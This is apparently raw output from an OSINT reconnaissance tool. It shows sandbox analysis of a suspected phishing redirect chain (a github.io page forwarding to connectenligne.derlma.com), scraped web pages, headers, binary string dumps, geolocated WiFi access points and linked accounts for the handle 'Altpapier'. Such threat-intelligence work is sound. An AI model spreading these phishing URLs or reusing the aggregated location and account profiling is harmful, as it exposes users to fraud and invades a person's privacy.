Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar54FB.tmp" has type "data"- Location: [%TEMP%\\Tar54FB.tmp]- [targetUID: 00000000-00003292]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004088]\n "Cab5361.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab5361.tmp]- [targetUID: 00000000-00003292]\n "http_404_1_" has type "HTML document UTF-8 Unicode (with BOM) text with very long lines with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://vismliko.github.io/runssitory/index.html"\n Pattern match: "https://vismliko.github.io"\n Heuristic match: "connectenligne.derlma.com"\n Pattern match: "https://connectenligne.derlma.com/TFGHFGHFTRH/11/mail@tler/nanelms/fr/9999"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /runssitory/index.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: vismliko.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nConnection: keep-alive\nContent-Length: 237\nServer: GitHub.com\nContent-Type: text/html; charset=utf-8\npermissions-policy: interest-cohort=()\nLast-Modified: Sat, 18 Feb 2023 20:40:04 GMT\nAccess-Control-Allow-Origin: *\nStrict-Transport-Security: max-age=31556952\nETag: "63f137a4-ed"\nexpires: Tue, 21 Feb 2023 01:07:42 GMT\nCache-Control: max-age=600\nx-proxy-cache: MISS\nX-GitHub-Request-Id: EADC:3606:196E1F:1DB1A0:63F41706\nAccept-Ranges: bytes\nDate: Tue, 21 Feb 2023 00:57:42 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10074-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1676941063.658138,VS0,VE95\nVary: Accept-Encoding\nX-Fastly-Request-ID: cdb302efca5f6fb6cece2995633e3658e2e79131"\n "<!DOCTYPE html>\n<html>\n <head>\n <meta charset="UTF-8" />\n <meta http-equiv="refresh" content="0; URL=https://connectenligne.derlma.com/TFGHFGHFTRH/11/mail@tler/nanelms/fr/9999" />\n </head>\n <body>\n \n </body>\n</html>"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: vismliko.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nConnection: keep-alive\nContent-Length: 5142\nServer: GitHub.com\nContent-Type: text/html; charset=utf-8\npermissions-policy: interest-cohort=()\nETag: W/"63cf03be-239b"\nContent-Security-Policy: default-src \'none\'; style-src \'unsafe-inline\'; img-src data:; connect-src \'self\'\nContent-Encoding: gzip\nX-GitHub-Request-Id: 3626:6688:196418:1DA771:63F41709\nAccept-Ranges: bytes\nDate: Tue, 21 Feb 2023 00:57:45 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10074-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1676941065.214280,VS0,VE87\nVary: Accept-Encoding\nX-Fastly-Request-ID: 8921bafc7550ba044cb481baf67d48229733be04"\n "GET /TFGHFGHFTRH/11/mail@tler/nanelms/fr/9999 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: connectenligne.derlma.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.0 404 Not Found\nDate: Tue, 21 Feb 2023 00:57:47 GMT\nServer: Apache/2.4.54 (Debian)\nContent-Length: 0\nConnection: close\nContent-Type: text/html; charset=UTF-8"'}, {u'category': u'External Systems', u'origin' | 185.199.109.153 |
| 2023-05-12 02:44:24 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c59a6bfbf716314-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Netherlands | 104.21.6.166 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.217): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:33:53 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Page Not Found</title>
<style>
</style>
</head>
<body>
<h1>Page Not Found</h1>
</div>
<p>Looks like you've followed a broken link or entered a URL that doesn't exist on this site.</p>
<p>
</svg>
Back to our site
</a>
</p>
</p>
</div>
</div>
</div>
<script>
</script>
</body>
</html>
| https://funny.battleb0t.xyz/images/withat_5.jpg |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | malsup.github.io | 185.199.110.153 |
| 2023-05-12 02:58:45 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://tiny.one/vkds2czp', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fd0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fd0_IESQMMUTEX_0_303"\n "IsoScope_fd0_IE_EarlyTabStart_0xa28_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fd0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4048"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_fd0_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_fd0_ConnHashTable<4048>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.197.3.8:80"\n "104.19.137.56:443"\n "184.31.135.120:80"\n "34.74.170.74:443"\n "18.158.249.130:443"\n "13.227.44.127:80"\n "13.227.44.75:80"\n "18.195.27.143:443"\n "54.230.57.124:80"\n "13.227.44.102:80"\n "54.230.57.140:80"\n "54.230.57.39:80"\n "205.185.216.42:443"\n "142.251.46.202:443"\n "142.251.46.232:443"\n "142.251.46.195:80"\n "142.250.188.14:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crl.pki.goog"\n "crl.rootca1.amazontrust.com"\n "crl.rootg2.amazontrust.com"\n "crl.sca1b.amazontrust.com"\n "crls.pki.goog"\n "fickfreunde.de"\n "o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "x1.c.lencr.org"\n "x2.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "crl.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "crl.sca1b.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.pki.goog"\n "crl.pki.goog"\n "crls.pki.goog"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "XM1W3787.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XM1W3787.txt]- [targetUID: 00000000-00004048]\n Dropped file: "GTDQ1BCW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GTDQ1BCW.txt]- [targetUID: 00000000-00004048]\n Dropped file: "NV1LND8V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NV1LND8V.txt]- [targetUID: 00000000-00003196]\n Dropped file: "91FRE6MN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\91FRE6MN.txt]- [targetUID: 00000000-00003196]\n Dropped file: "4YVPDQ8O.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4YVPDQ8O.txt]- [targetUID: 00000000-00004048]\n Dropped file: "JN3YCX92.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JN3YCX92.txt]- [targetUID: 00000000-00003196]\n Dropped file: "L7OFV9WB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L7OFV9WB.txt]- [targetUID: 00000000-00003196]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "CabE94D.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "bootstrap.min.c5b5b2fa19bd66ff23211d9f844e0131_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Report.wer.tmp" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004048]\n "3538626A1FCCCA43C7E18F220BDD9B02" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\3538626A1FCCCA43C7E18F220BDD9B02]- [targetUID: 00000000-00003196]\n "~DF7C3969B65B11E63B.TMP" has type "data"- Location: [%TEMP%\\~DF7C3969B65B11E63B.TMP]- [targetUID: 00000000-00004048]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003196]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003196]\n "73DA0AE306CF69ADAC457DB6B2997338" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00003196]\n "70DAE932E3BCB3C00656A27B544BA9CA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\70DAE932E3BCB3C00656A27B544BA9CA]- [targetUID: 00000000-00003196]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003196]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00004048]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00004048]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFCAAE1DAD68AC182.TMP" has type "data"- Location: [%TEMP%\\~DFFCAAE1DAD68AC182.TMP]- [targetUID: 00000000-00004048]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003196]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00003196]\n "~DFF63874B4B14647AC.TMP" has type "data"- Location: [%TEMP%\\~DFF63874B4B14647AC.TMP]- [targetUID: 00000000-00004048]\n "F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3]- [targetUID: 00000000-00003196]\n "7D6243C18F0F8F9AEC6638DD210F1984_70FF9CF72C17814AF5276C6CA0C1775E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_70FF9CF72C17814AF5276C6CA0C1775E]- [targetUID: 00000000-00003196]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://tiny.one/vkds2czp"\n Pattern match: "https://tiny.one"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontr | 34.74.170.74 |
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:80 | 172.67.135.9 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pfa (Net ID: 00:02:6F:C4:70:30) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/Altpapier/ | Altpapier |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | freesound (Category: music)
https://freesound.org/people/Altpapier/ | Altpapier |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c596497ac4b8134-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:54:18 | Web Content | No | Web Spider | 4 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
| nwapi.battleb0t.xyz |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.71.14 |
| 2023-05-12 03:09:55 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.104 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | aihu.xyz | ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | COLOURlovers (Category: hobby)
https://www.colourlovers.com/lover/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | villagio (Net ID: 00:01:24:F0:87:66) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:33:55 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | !22222222222222222222222222222222222222222222222222
3 zVm
Y7a5mH
LyBu5
@rO$T
gt@G<U
rCrV8
e$?>z
DvgsWuM_
w"$RO WW
uvW_c
KT`\d
Vb /'T
T\"zw
:W4cn
Ga96A$
S$jFv
cBK8<
bp1MDND
.rzQ`l
kRgKHB'/
DajA 8
hZk68
59L'`
sM!2C
Khv3$\
zqLtj
:GRx4
$L705
IogY$c
qOD t
e:otz$
gk>Ci"dm
j@@EDjf
hprOSM
1ZiZC aQ0
EXaQ0
5VFE$
xX<nU
w2mJd
JxZ9229
U>Ys.
5DOzij
Nk6R$
O5hDf$
5aNES
oQE/j
gOIcq
8?e.xl
q5 <`
v3Lbs
psF 4
1E/QE
| https://funny.battleb0t.xyz/images/random_1.jpeg |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ALARM (5F:3F:FA) (Net ID: 00:02:D1:5F:3F:FA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:44:09 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=*.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:33:55 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | cHRM
IDATx
9RD@R
6_:f
Q3ot<@
:_w$`i
8vw8uLk
iZpj
bI@kd
IDAT>
!H?RZ
Rz`8<
e RmZ
!heNN
ZZ@"U
P>HZD
xq5E
H!wqlM
qkR`
Z9wq-'C
ghdf9egC
O' :F`
Q16Oh.
i$sb$
iJpj0
Ir``:
@OIFR
"U04wI0
>/w`E
jp8YJ
jvvm:Z1
!lwc4i
| https://funny.battleb0t.xyz/images/favicon.png |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-ABFB (Net ID: 2C:99:24:4F:AB:F9) | 37.751, -97.822 |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | body{
padding-top:70px;
}
.jumbotron{
color: #2c3e50;
background-color: #ecf0f1;
}
.navbar-inverse{
color: #2c3e50;
}
.navbar-inverse .navbar-nav>li>a {
color: white;
}
.navbar-inverse .navbar-brand{
color: white;
} | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi.battleb0t.xyz |
